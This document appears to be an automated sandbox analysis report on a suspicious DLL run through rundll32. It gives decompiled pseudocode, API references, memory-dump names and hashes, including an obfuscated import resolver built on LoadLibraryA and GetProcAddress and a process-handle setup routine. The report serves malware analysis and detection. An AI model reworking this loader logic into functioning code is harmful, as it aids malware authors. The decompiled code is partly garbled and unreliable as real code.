								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6ddefaf6
0x6ddefafd
0x6ddefb00
0x6ddefb02
0x6ddefb09
0x6ddefb09
0x6ddefb0e
0x6ddefb10
0x6ddefb38
0x6ddefb38
0x6ddefb40
0x6ddefb49
0x6ddefb51
0x6ddefb53
0x6ddefb53
0x6ddefb59
0x6ddefb5c
0x6ddefb5f
0x6ddefb62
0x6ddefb63
0x6ddefb64
0x6ddefb6a
0x6ddefb6d
0x6ddefb73
0x6ddefb76
0x6ddefb77
0x6ddefb78
0x00000000
0x6ddefb12
0x6ddefb12
0x6ddefb14
0x00000000
0x6ddefb16
0x6ddefb1b
0x6ddefb21
0x6ddefb23
0x6ddefb34
0x6ddefb34
0x6ddefb25
0x6ddefb2a
0x6ddefb30
0x6ddefb32
0x6ddefb7a
0x6ddefb7a
0x6ddefb81
0x00000000
0x00000000
0x00000000
0x6ddefb32
0x6ddefb23
0x6ddefb14
0x6ddefb85
0x6ddefb04
0x6ddefb04
0x6ddefb07
0x6ddefb88
0x6ddefb8d
0x6ddefb95
0x6ddefb9a
0x6ddefba3
0x6ddefbaa
0x6ddefc09
0x6ddefc09
0x6ddefc10
0x6ddefc10
0x6ddefbac
0x6ddefbac
0x6ddefbb1
0x6ddefbbb
0x00000000
0x6ddefbbd
0x6ddefbc2
0x6ddefbc9
0x00000000
0x6ddefbcb
0x6ddefbd7
0x6ddefbde
0x6ddefbe0
0x00000000
0x6ddefbe2
0x6ddefbe2
0x6ddefbe6
0x00000000
0x6ddefbe8
0x6ddefbe8
0x6ddefbef
0x6ddefbef
0x6ddefbe6
0x6ddefbe0
0x6ddefbc9
0x6ddefbbb
0x6ddefc15
0x6ddefc21
0x00000000
0x00000000
0x00000000
0x6ddefb07
0x6ddefaf8
0x6ddefafb
0x6ddefafb

Strings

Tnm, xrefs: 6DDEFB44
`nm, xrefs: 6DDEFB65

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: Tnm$`nm
API String ID: 0-161697708
Opcode ID: 21f7894fcba99069b7eefa7634b426eda3ebc13a6d727f1769efbe79bbe5e0a1
Instruction ID: e10edf998502fe9cf1a2bd5a145b442c75ffdda1d99aa5e2b94bbceb1c3a4de4
Opcode Fuzzy Hash: 21f7894fcba99069b7eefa7634b426eda3ebc13a6d727f1769efbe79bbe5e0a1
Instruction Fuzzy Hash: 4211A732D06615D6DF01EF78D9007EE77E55B02768F11415BEA10EF181D7B1D6058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD3751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DDD3751(void* __ebx, signed int* __ecx, signed char* __edi, void* __esi) {
				signed int _t18;
				intOrPtr* _t26;
				signed int _t29;
				signed char _t33;
				void* _t35;
				signed char _t40;
				void* _t41;
				intOrPtr* _t42;

				E6DDF00E0(0x6de38012, __ebx, __edi, __esi, 0x38);
				_t40 = __ecx;
				_t33 =  *((intOrPtr*)(_t41 + 8));
				_t18 = _t33 & 0x000000ff;
				if(_t18 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t33;
					if(_t33 != 0) {
						goto L4;
					} else {
						E6DDD1F9A(_t41 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						_t7 = _t41 - 4;
						 *_t7 =  *(_t41 - 4) & 0x00000000;
						__eflags =  *_t7;
						_t35 = _t41 - 0x44;
						E6DDD0C7C(__ebx, _t35, __edi, _t40,  *_t7);
						 *_t42 = 0x6de93430;
						E6DDF3D74(_t41 - 0x44, _t41 - 0x28);
						asm("scasb");
						asm("aaa");
						asm("invalid");
						if(__eflags >= 0) {
							_t26 =  *((intOrPtr*)(_t42 + 4));
							 *_t26 =  *((intOrPtr*)(_t35 + 4));
							return _t26;
						} else {
							asm("invalid");
							 *__edi =  *__edi ^ 0x000000dd;
							asm("insd");
							 *__edi = _t40;
							asm("invalid");
							asm("aaa");
							asm("invalid");
							asm("pushfd");
							asm("aaa");
							asm("invalid");
							asm("pushfd");
							asm("aaa");
							asm("invalid");
							asm("movsd");
							asm("aaa");
							asm("invalid");
							asm("aaa");
							asm("invalid");
							_t29 =  *((intOrPtr*)(_t35 + 4)) - 0x10;
							__eflags = _t29;
							return _t29;
						}
					}
				} else {
					switch( *((intOrPtr*)(_t18 * 4 +  &M6DDD37E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t30 = E6DDD4B1C(__ebx, __edi, __ecx, _t43);
							goto L3;
						case 2:
							__eax = E6DDD4B64(__eflags);
							goto L3;
						case 3:
							__eax = E6DDD4B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6DDD4BCF(__eflags);
							L3:
							 *_t40 = _t30;
							L4:
							return E6DDF008A(_t40, _t31, _t37, _t40);
							goto L16;
					}
				}
				L16:
			}

0x6ddd3758
0x6ddd375d
0x6ddd375f
0x6ddd3762
0x6ddd3768
0x6ddd37b3
0x6ddd37b6
0x6ddd37b8
0x00000000
0x6ddd37ba
0x6ddd37c2
0x6ddd37c7
0x6ddd37c7
0x6ddd37c7
0x6ddd37cf
0x6ddd37d2
0x6ddd37da
0x6ddd37e2
0x6ddd37e9
0x6ddd37ea
0x6ddd37eb
0x6ddd37ed
0x6ddd3826
0x6ddd382d
0x6ddd382f
0x6ddd37ef
0x6ddd37ef
0x6ddd37f1
0x6ddd37f4
0x6ddd37f5
0x6ddd37f7
0x6ddd37fa
0x6ddd37fb
0x6ddd37fd
0x6ddd37fe
0x6ddd37ff
0x6ddd3801
0x6ddd3802
0x6ddd3803
0x6ddd3805
0x6ddd3806
0x6ddd3807
0x6ddd380a
0x6ddd380b
0x6ddd3810
0x6ddd3810
0x6ddd3813
0x6ddd3813
0x6ddd37ed
0x6ddd376a
0x6ddd376a
0x00000000
0x6ddd37ae
0x00000000
0x00000000
0x6ddd3771
0x00000000
0x00000000
0x6ddd3782
0x00000000
0x00000000
0x6ddd3789
0x00000000
0x00000000
0x6ddd3797
0x00000000
0x00000000
0x6ddd379c
0x6ddd379f
0x00000000
0x00000000
0x6ddd37a5
0x6ddd37a8
0x00000000
0x00000000
0x6ddd3790
0x6ddd3776
0x6ddd3776
0x6ddd3778
0x6ddd377f
0x00000000
0x00000000
0x6ddd376a
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 6DDD3758
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD37E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6DDD37BA

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: a0be054d27ad3d2dd02a83b00343dfd0026bbc62f88612eb2295aa96a7b4f5af
Instruction ID: 12b33f3c075e8807ee77d3abe2eaef285a18a6daae0c2c21b8defe568f68e078
Opcode Fuzzy Hash: a0be054d27ad3d2dd02a83b00343dfd0026bbc62f88612eb2295aa96a7b4f5af
Instruction Fuzzy Hash: D0016DF286CA05FBDF81BF64C9417ACB2E4BF26366F22851AF1C0A6040DBB41585C762

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24B79, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE24B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6DE01F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6DE12281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6DE12281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6DE28CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6DE12281())) = 0x16;
					return E6DE1215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x6de24b79
0x6de24b82
0x6de24b87
0x6de24b8a
0x6de24b8e
0x6de24b9d
0x6de24ba0
0x6de24bc0
0x6de24bc5
0x6de24bc8
0x6de24bca
0x6de24c98
0x6de24c9e
0x6de24cb3
0x6de24cbf
0x6de24cc5
0x6de24cc7
0x6de24cd6
0x6de24cd6
0x6de24cd6
0x6de24cd9
0x6de24cd9
0x6de24cdd
0x6de24cdf
0x6de24ce2
0x6de24ce2
0x6de24ce2
0x6de24ce2
0x00000000
0x6de24ce9
0x6de24cce
0x00000000
0x6de24cce
0x6de24ca0
0x6de24ca3
0x6de24ca3
0x6de24ca6
0x6de24ca6
0x6de24ca8
0x6de24ca9
0x6de24ca9
0x6de24cad
0x00000000
0x6de24cad
0x6de24bd0
0x6de24bd6
0x6de24c03
0x6de24c0f
0x6de24c15
0x6de24c17
0x00000000
0x00000000
0x6de24c1d
0x6de24c23
0x6de24c26
0x6de24c82
0x6de24c87
0x6de24c8f
0x00000000
0x6de24c8f
0x6de24c28
0x6de24c2b
0x6de24c2d
0x6de24c30
0x6de24c32
0x6de24c34
0x6de24c6a
0x6de24c78
0x6de24c7e
0x6de24c80
0x6de24c94
0x00000000
0x6de24c94
0x00000000
0x00000000
0x00000000
0x00000000
0x6de24c36
0x6de24c36
0x6de24c36
0x6de24c39
0x6de24c3c
0x6de24c3e
0x00000000
0x00000000
0x6de24c48
0x6de24c4f
0x6de24c52
0x6de24c54
0x6de24c5c
0x6de24c5c
0x6de24c5f
0x6de24c60
0x6de24c63
0x6de24c65
0x00000000
0x00000000
0x00000000
0x6de24c65
0x6de24c56
0x6de24c57
0x6de24c5a
0x00000000
0x00000000
0x00000000
0x6de24c5a
0x6de24c67
0x00000000
0x6de24c67
0x6de24bd8
0x6de24bda
0x00000000
0x00000000
0x6de24be0
0x6de24be3
0x6de24be7
0x6de24bea
0x6de24bee
0x00000000
0x00000000
0x6de24bf4
0x6de24bf5
0x6de24bf8
0x6de24bfa
0x00000000
0x00000000
0x00000000
0x6de24bfc
0x00000000
0x6de24be3
0x6de24ba7
0x00000000
0x6de24bb2
0x6de24b94
0x6de24b9a
0x00000000
0x6de24b9a
0x6de24cf1

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,96574AD2,96574AD2,00000000,00000000,00000000,00000000,00000000), ref: 6DE24C0F
GetLastError.KERNEL32 ref: 6DE24C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6DE24C78

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 035e4c005c87b44f7b02fbb491c349471c144d3d815887ecafa7112123b83920
Instruction ID: 288bda7154555f8af1ffb8620a1bed8bfbe0c094c54c8ad6ccb09de043c99e3e
Opcode Fuzzy Hash: 035e4c005c87b44f7b02fbb491c349471c144d3d815887ecafa7112123b83920
Instruction Fuzzy Hash: F341E574604207EFEB159FA8CC45B7A7BB4EF6A328F31815AE955BB290DF318901C750

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4672 Parent PID: 4036 rundll32.exeCOMMON

Executed Functions

Non-executed Functions

Function 6DDB146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDB146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6ddb41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6ddb41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6ddb41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6ddb41a8 = _t5;
					 *0x6ddb41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6ddb41a4 = _t6;
					if(_t6 == 0) {
						 *0x6ddb41a4 =  *0x6ddb41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6ddb146d
0x6ddb147b
0x6ddb1483
0x6ddb1488
0x6ddb14d2
0x6ddb14d2
0x6ddb148a
0x6ddb1492
0x6ddb14ce
0x6ddb14d0
0x6ddb1494
0x6ddb1494
0x6ddb1499
0x6ddb14a7
0x6ddb14ac
0x6ddb14b2
0x6ddb14ba
0x6ddb14bf
0x6ddb14c1
0x6ddb14c1
0x6ddb14cb
0x6ddb14cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDB17B8,751463F0,00000000), ref: 6DDB147B
GetVersion.KERNEL32 ref: 6DDB148A
GetCurrentProcessId.KERNEL32 ref: 6DDB1499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDB14B2

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 006ba6b23397cfa0c826284f62529e186b6faf16ca74f21ff496c875098931bb
Instruction ID: 6190901ed129e43140ee5d0109796f999a6cc083420351c2883d011a5fbaba46
Opcode Fuzzy Hash: 006ba6b23397cfa0c826284f62529e186b6faf16ca74f21ff496c875098931bb
Instruction Fuzzy Hash: A2F067F0A85211EFFF00FF68A8097813BB8BB0AB9DF10101AF166D90C0D7B080409B04

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDB1F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6ddb41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6ddb1f31
0x6ddb1f3a
0x6ddb1f3f
0x6ddb1f45
0x6ddb1f4e
0x6ddb1f54
0x6ddb1f56
0x6ddb1f59
0x6ddb1f5e
0x6ddb1f65
0x6ddb1f65
0x6ddb1f69
0x6ddb1f71
0x6ddb1f74
0x00000000
0x00000000
0x6ddb1f7a
0x6ddb1f84
0x6ddb1f86
0x6ddb1f89
0x6ddb1f8c
0x6ddb1f90
0x6ddb1f98
0x6ddb1f9a
0x6ddb1f9d
0x6ddb2005
0x6ddb2005
0x6ddb2009
0x00000000
0x00000000
0x6ddb1fa2
0x6ddb1fa8
0x6ddb1faa
0x6ddb1fbd
0x6ddb1fc0
0x6ddb1fc0
0x6ddb1fc0
0x6ddb1fc4
0x6ddb1fac
0x6ddb1fac
0x6ddb1fb4
0x6ddb1fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddb1fb6
0x6ddb1fa4
0x6ddb1fa4
0x6ddb1fb8
0x6ddb1fb8
0x6ddb1fb8
0x6ddb1fc7
0x6ddb1fca
0x6ddb1fcc
0x6ddb1fd3
0x6ddb1fce
0x6ddb1fce
0x6ddb1fce
0x6ddb1fdb
0x6ddb1fe1
0x6ddb1fe3
0x6ddb2013
0x6ddb1fe5
0x6ddb1fe5
0x6ddb1fe8
0x6ddb1fea
0x6ddb1ff2
0x6ddb1ff2
0x6ddb1ff7
0x6ddb1ff9
0x6ddb2000
0x6ddb2002
0x6ddb2002
0x6ddb2002
0x00000000
0x6ddb2002
0x00000000
0x6ddb1fe3
0x6ddb1f92
0x6ddb1f94
0x6ddb1f96
0x00000000
0x00000000
0x6ddb1f96
0x6ddb2016
0x6ddb2016
0x6ddb201d
0x6ddb2022
0x00000000
0x00000000
0x6ddb2028
0x6ddb2033
0x00000000
0x6ddb2033
0x6ddb202a
0x6ddb202a
0x6ddb2030
0x00000000
0x6ddb2030
0x6ddb1f5e
0x6ddb2034
0x6ddb2039

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6DDB1F69
GetProcAddress.KERNEL32(?,00000000), ref: 6DDB1FDB

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f64efd9b7cdcb603ee915460a9316f4afa6e6e3dbd540b7a76c0b246bce95067
Instruction ID: b0bbae7907098f21562394028c909c88114f3a4683c84c8696d677b387655901
Opcode Fuzzy Hash: f64efd9b7cdcb603ee915460a9316f4afa6e6e3dbd540b7a76c0b246bce95067
Instruction Fuzzy Hash: B4313BB2A4020ADFDB14DF59C880BAEBBF4BF4934DF104169E852E7241E774DA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDB2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6ddb41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6ddb4240 = 1;
										__eflags =  *0x6ddb4240;
										if( *0x6ddb4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6ddb41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6ddb4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6ddb41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6ddb4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6ddb41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6ddb4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ddb4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
